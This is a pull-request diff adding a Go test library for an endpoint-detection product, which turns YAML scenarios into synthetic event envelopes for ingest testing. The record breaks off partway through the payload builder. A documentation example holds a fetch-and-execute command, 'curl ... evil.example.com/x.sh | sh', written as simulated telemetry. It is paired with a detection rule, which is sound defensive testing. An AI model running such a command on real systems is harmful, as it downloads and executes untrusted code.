### PR TITLE
M3: fakeagent library for scenario-driven event injection

### DIFF
--- a/Taskfile.yml
+++ b/Taskfile.yml
@@ -157,16 +157,16 @@ tasks:
 
   test:go:agent:
     desc: |
-      Run Go tests with race detector for agent + shared code only. No DB
-      required. Use from CI's agent-test job so the server tests don't run
-      on a runner that doesn't have MySQL.
+      Run Go tests with race detector for agent + shared code + the M3
+      fakeagent library. No DB required. Use from CI's agent-test job so the
+      server tests don't run on a runner that doesn't have MySQL.
 
       Second invocation: the headless agent's tests (UAT plan M2) live behind
       `//go:build !darwin || !cgo` and are skipped by the first invocation
       under the default CGO_ENABLED=1. Run them with cgo disabled so they
       execute on every PR.
     cmds:
-      - go test -race -count=1 -timeout=10m ./agent/... ./internal/...
+      - go test -race -count=1 -timeout=10m ./agent/... ./internal/... ./test/fakeagent/...
       - CGO_ENABLED=0 go test -count=1 -timeout=10m ./agent/cmd/fleet-edr-agent-headless/...
 
   test:go:agent:coverage:
@@ -190,7 +190,7 @@ tasks:
       # See comment on test:go:server:coverage. Same -coverpkg fix so agent
       # tests that exercise shared internal/ packages (observability, envparse)
       # contribute to those packages' coverage on Sonar.
-      - go test -race -count=1 -timeout=10m -coverpkg=./agent/...,./internal/... -coverprofile=coverage-agent.out -covermode=atomic ./agent/... ./internal/...
+      - go test -race -count=1 -timeout=10m -coverpkg=./agent/...,./internal/...,./test/fakeagent/... -coverprofile=coverage-agent.out -covermode=atomic ./agent/... ./internal/... ./test/fakeagent/...
       # CGO_ENABLED=0 run for the headless package. -race is dropped because the race detector requires cgo. -coverpkg is narrowed to
       # just the M2-new packages so the profile is essentially disjoint from the first run; see the desc above for the common.go
       # caveat.

--- a/docs/testing-strategy.md
+++ b/docs/testing-strategy.md
@@ -132,12 +132,14 @@ and headless binary are the shared substrate.
 
 The same library serves multiple consumers, so the wire contract is exercised end to end at every layer that uses it:
 
-- `test/fakeagent/`: Go library. Loads YAML scenarios, feeds events into a `Receiver` (in-process) or posts envelopes
-  directly to a server URL.
+- `test/fakeagent/`: Go library (UAT plan **M3**). Loads YAML scenarios, emits wire-format envelopes with deterministic
+  timestamps, and feeds them either through the headless binary's `POST /event` control plane (`FeedControlPlane`) or
+  directly to a server's ingest endpoint with a bearer token (`PostDirect`). Functional options cover start time, host
+  id override, playback speed multiplier, and `PostDirect` batch size.
 - `agent/cmd/fleet-edr-agent-headless`: production agent built with the stub receiver, plus an opt-in unix-socket control
   plane for tests. Doubles as the load generator.
-- `test/fakeagent/scenarios/`: YAML files describing event timelines, host metadata, and (where applicable) detection
-  assertions.
+- `test/fakeagent/scenarios/`: starter YAML scenarios shipped with M3 (`quiet-host`, `exec-fork-exit`,
+  `dns-and-network`). The M10 efficacy corpus and the L3 integration job add their own scenarios under separate paths.
 
 A scenario file looks like:
 
@@ -149,12 +151,17 @@ host:
   hostname: lab-mac.local
   os: macOS 14.4
 timeline:
-  - {at: 0ms,   type: fork, pid: 4001, ppid: 1}
-  - {at: 5ms,   type: exec, pid: 4001, path: /bin/zsh, args: ["zsh", "-c", "curl https://evil.example.com/x.sh | sh"]}
-  - {at: 10ms,  type: fork, pid: 4002, ppid: 4001}
-  - {at: 12ms,  type: exec, pid: 4002, path: /usr/bin/curl, args: ["curl", "https://evil.example.com/x.sh"]}
-  - {at: 50ms,  type: network_connect, pid: 4002, remote_ip: 203.0.113.7, remote_port: 443}
-  - {at: 200ms, type: exit, pid: 4002, code: 0}
+  - {at: 0ms,   type: fork, child_pid: 4001, parent_pid: 1}
+  - {at: 5ms,   type: exec, pid: 4001, ppid: 1, path: /bin/zsh,
+       args: ["zsh", "-c", "curl https://evil.example.com/x.sh | sh"],
+       cwd: /tmp, uid: 501, gid: 20}
+  - {at: 10ms,  type: fork, child_pid: 4002, parent_pid: 4001}
+  - {at: 12ms,  type: exec, pid: 4002, ppid: 4001, path: /usr/bin/curl,
+       args: ["curl", "https://evil.example.com/x.sh"],
+       cwd: /tmp, uid: 501, gid: 20}
+  - {at: 50ms,  type: network_connect, pid: 4002, protocol: tcp, direction: outbound,
+       remote_address: 203.0.113.7, remote_port: 443}
+  - {at: 200ms, type: exit, pid: 4002, exit_code: 0}
 assertions:
   - within: 5s
     rule: suspicious-curl-pipe-sh

--- a/go.mod
+++ b/go.mod
@@ -30,6 +30,7 @@ require (
 	golang.org/x/tools v0.44.0
 	modernc.org/sqlite v1.49.1
 	pgregory.net/rapid v1.3.0
+	sigs.k8s.io/yaml v1.6.0
 )
 
 require (
@@ -101,7 +102,6 @@ require (
 	modernc.org/libc v1.72.0 // indirect
 	modernc.org/mathutil v1.7.1 // indirect
 	modernc.org/memory v1.11.0 // indirect
-	sigs.k8s.io/yaml v1.6.0 // indirect
 )
 
 tool (

--- a/test/fakeagent/fakeagent.go
+++ b/test/fakeagent/fakeagent.go
@@ -14,6 +14,7 @@
 package fakeagent
 
 import (
+	"encoding/json"
 	"errors"
 	"fmt"
 	"os"
@@ -109,10 +110,18 @@ type Assertion struct {
 type Duration time.Duration
 
 // UnmarshalJSON accepts either a JSON string ("10ms", "5s") or a JSON number (nanoseconds). The string form is what scenario
-// authors write; the number form lets test code round-trip Envelopes back through encoding/json without losing precision.
+// authors write; the number form lets test code round-trip Envelopes back through encoding/json without losing precision. Both
+// branches delegate to encoding/json so escape sequences, overflow, and malformed-quoting cases are all handled by the stdlib's
+// well-fuzzed parser rather than a hand-rolled byte loop.
 func (d *Duration) UnmarshalJSON(data []byte) error {
-	if len(data) > 0 && data[0] == '"' {
-		s := string(data[1 : len(data)-1])
+	if len(data) == 0 {
+		return errors.New("duration: empty input")
+	}
+	if data[0] == '"' {
+		var s string
+		if err := json.Unmarshal(data, &s); err != nil {
+			return fmt.Errorf("duration: invalid quoted value: %w", err)
+		}
 		parsed, err := time.ParseDuration(s)
 		if err != nil {
 			return fmt.Errorf("duration %q: %w", s, err)
@@ -120,13 +129,10 @@ func (d *Duration) UnmarshalJSON(data []byte) error {
 		*d = Duration(parsed)
 		return nil
 	}
-	// Bare number: nanoseconds.
+	// Bare number: nanoseconds. json.Unmarshal into int64 rejects floats, overflow, and non-numeric tokens with a typed error.
 	var ns int64
-	for _, c := range data {
-		if c < '0' || c > '9' {
-			return fmt.Errorf("duration: expected string or integer nanoseconds, got %q", data)
-		}
-		ns = ns*10 + int64(c-'0')
+	if err := json.Unmarshal(data, &ns); err != nil {
+		return fmt.Errorf("duration: expected string or integer nanoseconds, got %q: %w", data, err)
 	}
 	*d = Duration(ns)
 	return nil

--- a/test/fakeagent/fakeagent.go
+++ b/test/fakeagent/fakeagent.go
@@ -1,0 +1,190 @@
+// Package fakeagent generates EDR event-envelope timelines from YAML scenarios and feeds them either through the M2 headless agent's
+// unix-socket control plane (FeedControlPlane) or directly to a server's ingest endpoint (PostDirect). It is the substrate that the
+// UAT plan's L3 headless-agent-plus-server integration tests (milestone M4), the L6 detection-efficacy corpus (M10), and the eventual
+// Playwright fixtures + scale tests (M12) all share.
+//
+// The scenario format is documented in docs/testing-strategy.md. A starter set lives under scenarios/.
+//
+// The wire envelope this package emits is the same one the production agent emits (see schema/events.json): an array of
+//
+//	{event_id, host_id, timestamp_ns, event_type, payload}
+//
+// where payload is a per-event-type object. The same struct types serialise to both YAML (scenario authoring) and JSON (wire format)
+// via the sigs.k8s.io/yaml adapter which delegates to encoding/json under the hood, so JSON tags are the single source of truth.
+package fakeagent
+
+import (
+	"errors"
+	"fmt"
+	"os"
+	"time"
+
+	"sigs.k8s.io/yaml"
+)
+
+// Scenario is the in-memory representation of a YAML scenario file. Loaded by LoadScenario; fed through the control plane or posted
+// direct by the methods on this type.
+type Scenario struct {
+	// Name is a human label used in log lines and test failures.
+	Name string `json:"name"`
+
+	// MITRE is the optional ATT&CK technique identifier (e.g. "T1059.004"). M10's efficacy corpus uses it to map scenarios to
+	// detection assertions; M3 just preserves the field.
+	MITRE string `json:"mitre,omitempty"`
+
+	// Host carries the per-host metadata stamped on every envelope's host_id field. ID may be overridden at run time via WithHostID.
+	Host Host `json:"host"`
+
+	// Timeline is the ordered list of events the scenario will emit. The library does not sort by At; the YAML author owns ordering.
+	Timeline []Event `json:"timeline"`
+
+	// Assertions are parsed but not consumed in M3. M4's CI integration test and M10's efficacy harness will read them.
+	Assertions []Assertion `json:"assertions,omitempty"`
+}
+
+// Host is the scenario's host metadata. ID is required; hostname + OS are optional context that may be used later for synthesised
+// enrollment payloads.
+type Host struct {
+	ID       string `json:"id"`
+	Hostname string `json:"hostname,omitempty"`
+	OS       string `json:"os,omitempty"`
+}
+
+// Event is a single timeline entry. The struct is intentionally flat with omitempty everywhere: the union of all event-type payloads
+// is small, and a flat shape keeps both YAML authoring (no nesting per type) and JSON wire emission ergonomic. Type drives which
+// fields are honoured in the emitted payload; fields irrelevant to Type are zero-valued and dropped by the per-type marshaller.
+type Event struct {
+	// At is the offset from the scenario's start time. Generated envelopes get timestamp_ns = startTime + At.nanoseconds.
+	At Duration `json:"at"`
+
+	// Type is the event_type written into the wire envelope. Must be one of the values in schema/events.json's event_type enum.
+	Type string `json:"type"`
+
+	// Common process-graph fields.
+	PID  int `json:"pid,omitempty"`
+	PPID int `json:"ppid,omitempty"`
+	UID  int `json:"uid,omitempty"`
+	GID  int `json:"gid,omitempty"`
+
+	// fork specifics.
+	ChildPID  int `json:"child_pid,omitempty"`
+	ParentPID int `json:"parent_pid,omitempty"`
+
+	// exec specifics.
+	Path string   `json:"path,omitempty"`
+	Args []string `json:"args,omitempty"`
+	CWD  string   `json:"cwd,omitempty"`
+
+	// exit specifics.
+	ExitCode   int    `json:"exit_code,omitempty"`
+	ExitReason string `json:"exit_reason,omitempty"`
+
+	// open specifics.
+	Flags int `json:"flags,omitempty"`
+
+	// network_connect specifics.
+	Protocol      string `json:"protocol,omitempty"`
+	Direction     string `json:"direction,omitempty"`
+	LocalAddress  string `json:"local_address,omitempty"`
+	LocalPort     int    `json:"local_port,omitempty"`
+	RemoteAddress string `json:"remote_address,omitempty"`
+	RemotePort    int    `json:"remote_port,omitempty"`
+
+	// dns_query specifics.
+	QueryName         string   `json:"query_name,omitempty"`
+	QueryType         string   `json:"query_type,omitempty"`
+	ResponseAddresses []string `json:"response_addresses,omitempty"`
+}
+
+// Assertion is the M4/M10 detection-assertion shape. Parsed by M3 for forward compatibility but not consumed.
+type Assertion struct {
+	Within   Duration `json:"within"`
+	Rule     string   `json:"rule"`
+	Severity string   `json:"severity"`
+}
+
+// Duration is a YAML-friendly wrapper around time.Duration. YAML naturally serialises Go durations as strings like "10ms" or "5s"
+// when parsed via the standard library, but the sigs.k8s.io/yaml path goes via JSON, which renders time.Duration as an integer of
+// nanoseconds. This wrapper parses the human-friendly string form so scenarios can use "10ms"/"5s"/"1h" idiomatically.
+type Duration time.Duration
+
+// UnmarshalJSON accepts either a JSON string ("10ms", "5s") or a JSON number (nanoseconds). The string form is what scenario
+// authors write; the number form lets test code round-trip Envelopes back through encoding/json without losing precision.
+func (d *Duration) UnmarshalJSON(data []byte) error {
+	if len(data) > 0 && data[0] == '"' {
+		s := string(data[1 : len(data)-1])
+		parsed, err := time.ParseDuration(s)
+		if err != nil {
+			return fmt.Errorf("duration %q: %w", s, err)
+		}
+		*d = Duration(parsed)
+		return nil
+	}
+	// Bare number: nanoseconds.
+	var ns int64
+	for _, c := range data {
+		if c < '0' || c > '9' {
+			return fmt.Errorf("duration: expected string or integer nanoseconds, got %q", data)
+		}
+		ns = ns*10 + int64(c-'0')
+	}
+	*d = Duration(ns)
+	return nil
+}
+
+// MarshalJSON emits the duration as its native Go-string form so a round-trip through the YAML loader plus a subsequent JSON dump
+// yields a human-readable scenario rather than a wall of nanoseconds.
+func (d Duration) MarshalJSON() ([]byte, error) {
+	return []byte(`"` + time.Duration(d).String() + `"`), nil
+}
+
+// LoadScenario reads a YAML scenario file from path and validates the minimum invariants the scenario relies on (non-empty name,
+// non-empty host id, at least one timeline entry, recognized event_type strings). It returns a fully populated Scenario or a
+// diagnostic error that names the offending file and field so a test failure points the author at the right place.
+func LoadScenario(path string) (*Scenario, error) {
+	raw, err := os.ReadFile(path) //nolint:gosec // path comes from test code, not untrusted input
+	if err != nil {
+		return nil, fmt.Errorf("fakeagent: read %s: %w", path, err)
+	}
+	var s Scenario
+	if err := yaml.Unmarshal(raw, &s); err != nil {
+		return nil, fmt.Errorf("fakeagent: parse %s: %w", path, err)
+	}
+	if err := s.Validate(); err != nil {
+		return nil, fmt.Errorf("fakeagent: validate %s: %w", path, err)
+	}
+	return &s, nil
+}
+
+// Validate enforces the structural invariants every scenario must hold for the envelope builder + feeder to produce well-formed
+// wire output. Called automatically by LoadScenario; exposed so test code that constructs a Scenario in-memory can re-run the same
+// checks without a temp file round trip.
+func (s *Scenario) Validate() error {
+	if s.Name == "" {
+		return errors.New("name is required")
+	}
+	if s.Host.ID == "" {
+		return errors.New("host.id is required")
+	}
+	if len(s.Timeline) == 0 {
+		return errors.New("timeline must contain at least one event")
+	}
+	for i, ev := range s.Timeline {
+		if !knownEventTypes[ev.Type] {
+			return fmt.Errorf("timeline[%d]: unknown event_type %q", i, ev.Type)
+		}
+	}
+	return nil
+}
+
+// knownEventTypes mirrors the enum in schema/events.json. application_control_block is omitted: those are emitted reactively by the
+// agent in response to server-pushed app-control rules, not produced by attack-corpus scenarios.
+var knownEventTypes = map[string]bool{
+	"exec":               true,
+	"fork":               true,
+	"exit":               true,
+	"open":               true,
+	"network_connect":    true,
+	"dns_query":          true,
+	"snapshot_heartbeat": true,
+}

--- a/test/fakeagent/fakeagent_test.go
+++ b/test/fakeagent/fakeagent_test.go
@@ -1,0 +1,228 @@
+package fakeagent
+
+import (
+	"encoding/json"
+	"os"
+	"path/filepath"
+	"slices"
+	"strconv"
+	"testing"
+	"time"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+)
+
+func TestLoadScenario_StarterCorpus(t *testing.T) {
+	// Walk the shipped scenarios under scenarios/ and assert each loads + validates. Catches regressions where a YAML edit drifts
+	// from the schema before any consumer (M4 CI, M10 efficacy) gets there.
+	entries, err := os.ReadDir("scenarios")
+	require.NoError(t, err)
+	require.NotEmpty(t, entries, "starter scenario set must not be empty")
+
+	for _, e := range entries {
+		if e.IsDir() || filepath.Ext(e.Name()) != ".yaml" {
+			continue
+		}
+		t.Run(e.Name(), func(t *testing.T) {
+			s, err := LoadScenario(filepath.Join("scenarios", e.Name()))
+			require.NoError(t, err)
+			assert.NotEmpty(t, s.Name)
+			assert.NotEmpty(t, s.Host.ID)
+			assert.NotEmpty(t, s.Timeline)
+			for i, ev := range s.Timeline {
+				assert.NotEmpty(t, ev.Type, "timeline[%d].type", i)
+			}
+		})
+	}
+}
+
+func TestLoadScenario_ValidationErrors(t *testing.T) {
+	cases := []struct {
+		name string
+		yaml string
+		want string
+	}{
+		{
+			name: "missing name",
+			yaml: "host: {id: h}\ntimeline: [{at: 0ms, type: fork, child_pid: 1, parent_pid: 0}]",
+			want: "name is required",
+		},
+		{
+			name: "missing host id",
+			yaml: "name: n\nhost: {}\ntimeline: [{at: 0ms, type: fork, child_pid: 1, parent_pid: 0}]",
+			want: "host.id is required",
+		},
+		{
+			name: "empty timeline",
+			yaml: "name: n\nhost: {id: h}\ntimeline: []",
+			want: "timeline must contain at least one event",
+		},
+		{
+			name: "unknown event type",
+			yaml: "name: n\nhost: {id: h}\ntimeline: [{at: 0ms, type: bogus}]",
+			want: "unknown event_type",
+		},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			dir := t.TempDir()
+			path := filepath.Join(dir, "scenario.yaml")
+			require.NoError(t, os.WriteFile(path, []byte(tc.yaml), 0o600))
+			_, err := LoadScenario(path)
+			require.Error(t, err)
+			assert.Contains(t, err.Error(), tc.want)
+		})
+	}
+}
+
+func TestLoadScenario_FileNotFound(t *testing.T) {
+	_, err := LoadScenario(filepath.Join(t.TempDir(), "does-not-exist.yaml"))
+	require.Error(t, err)
+	assert.Contains(t, err.Error(), "read ")
+}
+
+func TestLoadScenario_MalformedYAML(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "bad.yaml")
+	require.NoError(t, os.WriteFile(path, []byte("name: ok\nhost: not-an-object"), 0o600))
+	_, err := LoadScenario(path)
+	require.Error(t, err)
+	assert.Contains(t, err.Error(), "parse ")
+}
+
+func TestDurationUnmarshal(t *testing.T) {
+	cases := []struct {
+		in   string
+		want time.Duration
+	}{
+		{`"10ms"`, 10 * time.Millisecond},
+		{`"5s"`, 5 * time.Second},
+		{`"1h"`, time.Hour},
+		{`0`, 0},
+		{`123456789`, 123456789 * time.Nanosecond},
+	}
+	for _, tc := range cases {
+		t.Run(tc.in, func(t *testing.T) {
+			var d Duration
+			require.NoError(t, d.UnmarshalJSON([]byte(tc.in)))
+			assert.Equal(t, tc.want, time.Duration(d))
+		})
+	}
+}
+
+func TestDurationUnmarshal_Invalid(t *testing.T) {
+	cases := []string{`"not-a-duration"`, `12a`, `"7"`}
+	for _, tc := range cases {
+		t.Run(tc, func(t *testing.T) {
+			var d Duration
+			require.Error(t, d.UnmarshalJSON([]byte(tc)))
+		})
+	}
+}
+
+func TestEnvelopes_DeterministicTimestamps(t *testing.T) {
+	s, err := LoadScenario("scenarios/exec-fork-exit.yaml")
+	require.NoError(t, err)
+	start := time.Date(2026, 5, 20, 12, 0, 0, 0, time.UTC)
+
+	envs, err := s.Envelopes(WithStartTime(start), WithIDGenerator(seqID()))
+	require.NoError(t, err)
+	require.Len(t, envs, 3)
+
+	assert.Equal(t, start.UnixNano(), envs[0].TimestampNs)
+	assert.Equal(t, start.Add(2*time.Millisecond).UnixNano(), envs[1].TimestampNs)
+	assert.Equal(t, start.Add(25*time.Millisecond).UnixNano(), envs[2].TimestampNs)
+
+	// Deterministic ID generator yields predictable event_ids.
+	assert.Equal(t, []string{"e-0", "e-1", "e-2"}, []string{envs[0].EventID, envs[1].EventID, envs[2].EventID})
+}
+
+func TestEnvelopes_HostIDOverride(t *testing.T) {
+	s, err := LoadScenario("scenarios/exec-fork-exit.yaml")
+	require.NoError(t, err)
+
+	envs, err := s.Envelopes(WithHostID("override-1"))
+	require.NoError(t, err)
+	for _, env := range envs {
+		assert.Equal(t, "override-1", env.HostID)
+	}
+}
+
+func TestEnvelopes_PayloadShapePerEventType(t *testing.T) {
+	// One scenario, one event of each supported type. Build envelopes, then unmarshal each payload back into a generic map and
+	// assert on the required-fields-per-schema. Catches regressions where buildPayload omits a required field.
+	scenario := &Scenario{
+		Name: "all-types",
+		Host: Host{ID: "h"},
+		Timeline: []Event{
+			{At: 0, Type: "fork", ChildPID: 11, ParentPID: 1},
+			{At: 0, Type: "exec", PID: 11, PPID: 1, Path: "/bin/ls", Args: []string{"ls"}, CWD: "/", UID: 501, GID: 20},
+			{At: 0, Type: "exit", PID: 11, ExitCode: 0},
+			{At: 0, Type: "open", PID: 11, Path: "/etc/passwd", Flags: 1},
+			{At: 0, Type: "network_connect", PID: 11, Protocol: "tcp", Direction: "outbound", RemoteAddress: "10.0.0.1", RemotePort: 443},
+			{At: 0, Type: "dns_query", PID: 11, QueryName: "x.y", QueryType: "A"},
+			{At: 0, Type: "snapshot_heartbeat", PID: 11},
+		},
+	}
+	require.NoError(t, scenario.Validate())
+	envs, err := scenario.Envelopes(WithStartTime(time.Unix(0, 0)))
+	require.NoError(t, err)
+	require.Len(t, envs, 7)
+
+	required := map[string][]string{
+		"fork":               {"child_pid", "parent_pid"},
+		"exec":               {"pid", "ppid", "path", "args", "cwd", "uid", "gid"},
+		"exit":               {"pid", "exit_code"},
+		"open":               {"pid", "path", "flags"},
+		"network_connect":    {"pid", "protocol", "direction", "remote_address", "remote_port"},
+		"dns_query":          {"pid", "query_name", "query_type"},
+		"snapshot_heartbeat": {"pid"},
+	}
+	for _, env := range envs {
+		var payload map[string]any
+		require.NoError(t, json.Unmarshal(env.Payload, &payload), env.EventType)
+		for _, f := range required[env.EventType] {
+			_, ok := payload[f]
+			assert.True(t, ok, "%s payload missing required field %q", env.EventType, f)
+		}
+	}
+}
+
+func TestEnvelopes_PreservesTimelineOrder(t *testing.T) {
+	// Hand-build a scenario whose At offsets are NOT in ascending order so we know the library emits in timeline order, not sorted.
+	scenario := &Scenario{
+		Name: "order-test",
+		Host: Host{ID: "h"},
+		Timeline: []Event{
+			{At: Duration(500 * time.Millisecond), Type: "snapshot_heartbeat", PID: 1},
+			{At: Duration(100 * time.Millisecond), Type: "snapshot_heartbeat", PID: 2},
+			{At: Duration(200 * time.Millisecond), Type: "snapshot_heartbeat", PID: 3},
+		},
+	}
+	envs, err := scenario.Envelopes(WithStartTime(time.Unix(0, 0)))
+	require.NoError(t, err)
+	got := []int64{envs[0].TimestampNs, envs[1].TimestampNs, envs[2].TimestampNs}
+	// Library preserves authoring order even though timestamps are out-of-order.
+	want := []int64{
+		int64(500 * time.Millisecond),
+		int64(100 * time.Millisecond),
+		int64(200 * time.Millisecond),
+	}
+	assert.Equal(t, want, got)
+
+	// Sanity: if a caller wanted ascending-time delivery, they could sort.
+	sortedCopy := slices.Clone(got)
+	slices.Sort(sortedCopy)
+	assert.NotEqual(t, sortedCopy, got, "scenario authored out-of-time-order; library must preserve, not auto-sort")
+}
+
+// seqID returns a deterministic event-id generator producing "e-0", "e-1", ... Used by tests that want stable IDs.
+func seqID() func() string {
+	n := 0
+	return func() string {
+		id := "e-" + strconv.Itoa(n)
+		n++
+		return id
+	}
+}

--- a/test/fakeagent/feeder.go
+++ b/test/fakeagent/feeder.go
@@ -1,0 +1,244 @@
+package fakeagent
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net"
+	"net/http"
+	"time"
+)
+
+// Envelope is the wire shape this library emits per timeline event. Matches schema/events.json: the server's ingest endpoint and
+// the M2 headless binary's control plane both accept this exact shape.
+type Envelope struct {
+	EventID     string          `json:"event_id"`
+	HostID      string          `json:"host_id"`
+	TimestampNs int64           `json:"timestamp_ns"`
+	EventType   string          `json:"event_type"`
+	Payload     json.RawMessage `json:"payload"`
+}
+
+// Envelopes deterministically materialises the scenario's timeline into wire envelopes. Pure computation; no I/O. Useful for golden
+// tests and for callers that want to drive the envelopes themselves (e.g. M10's batch tooling).
+func (s *Scenario) Envelopes(opts ...Option) ([]Envelope, error) {
+	cfg := newRunConfig(opts)
+	hostID := s.Host.ID
+	if cfg.hostIDOverride != "" {
+		hostID = cfg.hostIDOverride
+	}
+	out := make([]Envelope, 0, len(s.Timeline))
+	for i, ev := range s.Timeline {
+		payload, err := buildPayload(ev)
+		if err != nil {
+			return nil, fmt.Errorf("timeline[%d] %s: %w", i, ev.Type, err)
+		}
+		ts := cfg.startTime.Add(time.Duration(ev.At)).UnixNano()
+		out = append(out, Envelope{
+			EventID:     cfg.idGenerator(),
+			HostID:      hostID,
+			TimestampNs: ts,
+			EventType:   ev.Type,
+			Payload:     payload,
+		})
+	}
+	return out, nil
+}
+
+// FeedControlPlane delivers each envelope to the M2 headless agent's POST /event endpoint over a unix socket. Used by the M4
+// integration test and by manual scenario drivers. Returns the first error from the control plane; subsequent envelopes are not
+// attempted (the test is interested in the failing case, not in continuing past it).
+//
+// Honours WithSpeed: a non-zero multiplier sleeps between envelopes to mimic real-time pacing; the default 0 fires every envelope
+// back-to-back which is what tests want.
+func (s *Scenario) FeedControlPlane(ctx context.Context, socketPath string, opts ...Option) error {
+	cfg := newRunConfig(opts)
+	envelopes, err := s.Envelopes(opts...)
+	if err != nil {
+		return err
+	}
+	client := unixSocketHTTPClient(socketPath)
+	url := "http://unix/event"
+
+	prev := time.Duration(0)
+	for i, env := range envelopes {
+		if cfg.speedMultiplier > 0 && i > 0 {
+			gap := time.Duration(s.Timeline[i].At) - prev
+			if err := sleepCtx(ctx, time.Duration(float64(gap)/cfg.speedMultiplier)); err != nil {
+				return err
+			}
+		}
+		prev = time.Duration(s.Timeline[i].At)
+		if err := postOne(ctx, client, url, env); err != nil {
+			return fmt.Errorf("FeedControlPlane envelope %d (%s): %w", i, env.EventType, err)
+		}
+	}
+	return nil
+}
+
+// PostDirect bypasses the agent entirely and POSTs envelope batches to baseURL + /api/events with a bearer token. Used by Playwright
+// fixtures that don't need to exercise the queue + uploader path (auth + RBAC tests, mostly) and by M10's bulk corpus replay.
+//
+// Honours WithBatchSize. Does NOT honour WithSpeed: batches are flushed as fast as the server can accept them.
+func (s *Scenario) PostDirect(ctx context.Context, baseURL, token string, opts ...Option) error {
+	cfg := newRunConfig(opts)
+	envelopes, err := s.Envelopes(opts...)
+	if err != nil {
+		return err
+	}
+	client := defaultHTTPClient()
+	url := baseURL + "/api/events"
+
+	for start := 0; start < len(envelopes); start += cfg.batchSize {
+		end := min(start+cfg.batchSize, len(envelopes))
+		body, err := json.Marshal(envelopes[start:end])
+		if err != nil {
+			return fmt.Errorf("PostDirect marshal batch %d:%d: %w", start, end, err)
+		}
+		req, err := http.NewRequestWithContext(ctx, http.MethodPost, url, bytes.NewReader(body))
+		if err != nil {
+			return err
+		}
+		req.Header.Set("Content-Type", "application/json")
+		req.Header.Set("Authorization", "Bearer "+token)
+		resp, err := client.Do(req)
+		if err != nil {
+			return fmt.Errorf("PostDirect batch %d:%d: %w", start, end, err)
+		}
+		_, _ = io.Copy(io.Discard, resp.Body)
+		_ = resp.Body.Close()
+		if resp.StatusCode/100 != 2 {
+			return fmt.Errorf("PostDirect batch %d:%d: server returned HTTP %d", start, end, resp.StatusCode)
+		}
+	}
+	return nil
+}
+
+// postOne sends one envelope to the headless binary's POST /event handler. The handler accepts a single envelope per call; that
+// matches the production receiver's one-event-at-a-time semantics (each XPC message carries one event).
+func postOne(ctx context.Context, client *http.Client, url string, env Envelope) error {
+	body, err := json.Marshal(env)
+	if err != nil {
+		return fmt.Errorf("marshal envelope: %w", err)
+	}
+	req, err := http.NewRequestWithContext(ctx, http.MethodPost, url, bytes.NewReader(body))
+	if err != nil {
+		return err
+	}
+	req.Header.Set("Content-Type", "application/json")
+	resp, err := client.Do(req)
+	if err != nil {
+		return err
+	}
+	_, _ = io.Copy(io.Discard, resp.Body)
+	_ = resp.Body.Close()
+	if resp.StatusCode/100 != 2 {
+		return fmt.Errorf("control plane returned HTTP %d", resp.StatusCode)
+	}
+	return nil
+}
+
+// HTTP-client timeouts. Unix socket is local so 5s is generous; PostDirect talks to a remote server and gets a longer budget.
+const (
+	unixSocketHTTPTimeout = 5 * time.Second
+	postDirectHTTPTimeout = 30 * time.Second
+)
+
+// unixSocketHTTPClient builds an http.Client whose transport dials the given unix socket regardless of the URL host. The
+// "http://unix" host in the URL is a placeholder net/http requires; the actual connection goes to socketPath. The dialer is a
+// per-call net.Dialer so the outer request's context cancellation propagates to the connect attempt.
+func unixSocketHTTPClient(socketPath string) *http.Client {
+	return &http.Client{
+		Timeout: unixSocketHTTPTimeout,
+		Transport: &http.Transport{
+			DialContext: func(ctx context.Context, _, _ string) (net.Conn, error) {
+				var d net.Dialer
+				return d.DialContext(ctx, "unix", socketPath)
+			},
+		},
+	}
+}
+
+// defaultHTTPClient builds the http.Client PostDirect uses. Modest timeout so a hung server fails the test rather than wedging it.
+func defaultHTTPClient() *http.Client { return &http.Client{Timeout: postDirectHTTPTimeout} }
+
+// sleepCtx is a context-aware sleep: returns the context's error if it cancels before the duration elapses.
+func sleepCtx(ctx context.Context, d time.Duration) error {
+	if d <= 0 {
+		return nil
+	}
+	t := time.NewTimer(d)
+	defer t.Stop()
+	select {
+	case <-ctx.Done():
+		return ctx.Err()
+	case <-t.C:
+		return nil
+	}
+}
+
+// buildPayload constructs the per-event-type payload object that the wire envelope embeds. The function picks the right field
+// subset for each event_type and emits exactly that, dropping zero-valued optional fields via the per-type struct's json tags.
+// Required-but-empty fields are NOT defaulted because the test author should see the resulting validation error from the server
+// and fix their scenario rather than silently shipping a malformed event.
+func buildPayload(ev Event) (json.RawMessage, error) {
+	switch ev.Type {
+	case "exec":
+		return json.Marshal(struct {
+			PID  int      `json:"pid"`
+			PPID int      `json:"ppid"`
+			Path string   `json:"path"`
+			Args []string `json:"args"`
+			CWD  string   `json:"cwd"`
+			UID  int      `json:"uid"`
+			GID  int      `json:"gid"`
+		}{ev.PID, ev.PPID, ev.Path, ev.Args, ev.CWD, ev.UID, ev.GID})
+	case "fork":
+		return json.Marshal(struct {
+			ChildPID  int `json:"child_pid"`
+			ParentPID int `json:"parent_pid"`
+		}{ev.ChildPID, ev.ParentPID})
+	case "exit":
+		out := struct {
+			PID        int    `json:"pid"`
+			ExitCode   int    `json:"exit_code"`
+			ExitReason string `json:"exit_reason,omitempty"`
+		}{ev.PID, ev.ExitCode, ev.ExitReason}
+		return json.Marshal(out)
+	case "open":
+		return json.Marshal(struct {
+			PID   int    `json:"pid"`
+			Path  string `json:"path"`
+			Flags int    `json:"flags"`
+		}{ev.PID, ev.Path, ev.Flags})
+	case "network_connect":
+		out := struct {
+			PID           int    `json:"pid"`
+			Protocol      string `json:"protocol"`
+			Direction     string `json:"direction"`
+			LocalAddress  string `json:"local_address,omitempty"`
+			LocalPort     int    `json:"local_port,omitempty"`
+			RemoteAddress string `json:"remote_address"`
+			RemotePort    int    `json:"remote_port"`
+		}{ev.PID, ev.Protocol, ev.Direction, ev.LocalAddress, ev.LocalPort, ev.RemoteAddress, ev.RemotePort}
+		return json.Marshal(out)
+	case "dns_query":
+		out := struct {
+			PID               int      `json:"pid"`
+			QueryName         string   `json:"query_name"`
+			QueryType         string   `json:"query_type"`
+			ResponseAddresses []string `json:"response_addresses,omitempty"`
+			Protocol          string   `json:"protocol,omitempty"`
+		}{ev.PID, ev.QueryName, ev.QueryType, ev.ResponseAddresses, ev.Protocol}
+		return json.Marshal(out)
+	case "snapshot_heartbeat":
